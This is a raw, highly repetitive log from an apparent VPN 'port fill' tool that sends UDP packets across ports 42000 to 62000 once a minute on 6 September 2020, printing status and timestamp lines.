6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:55:05 -Starting port fill at 2020-09-06 13:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:56:05 -Starting port fill at 2020-09-06 13:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:57:05 -Starting port fill at 2020-09-06 13:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:58:05 -Starting port fill at 2020-09-06 13:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:59:05 -Starting port fill at 2020-09-06 14:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:00:06 -Starting port fill at 2020-09-06 14:01:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:01:07 -Starting port fill at 2020-09-06 14:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:02:06 -Starting port fill at 2020-09-06 14:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:03:06 -Starting port fill at 2020-09-06 14:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:04:04 -Starting port fill at 2020-09-06 14:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:05:05 -Starting port fill at 2020-09-06 14:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:06:06 -Starting port fill at 2020-09-06 14:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:07:06 -Starting port fill at 2020-09-06 14:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:08:06 -Starting port fill at 2020-09-06 14:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:09:04 -Starting port fill at 2020-09-06 14:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:10:06 -Starting port fill at 2020-09-06 14:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:11:06 -Starting port fill at 2020-09-06 14:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:12:07 -Starting port fill at 2020-09-06 14:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:13:05 -Starting port fill at 2020-09-06 14:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:14:05 -Starting port fill at 2020-09-06 14:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:15:06 -Starting port fill at 2020-09-06 14:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:16:05 -Starting port fill at 2020-09-06 14:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:17:06 -Starting port fill at 2020-09-06 14:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:18:07 -Starting port fill at 2020-09-06 14:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:19:05 -Starting port fill at 2020-09-06 14:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 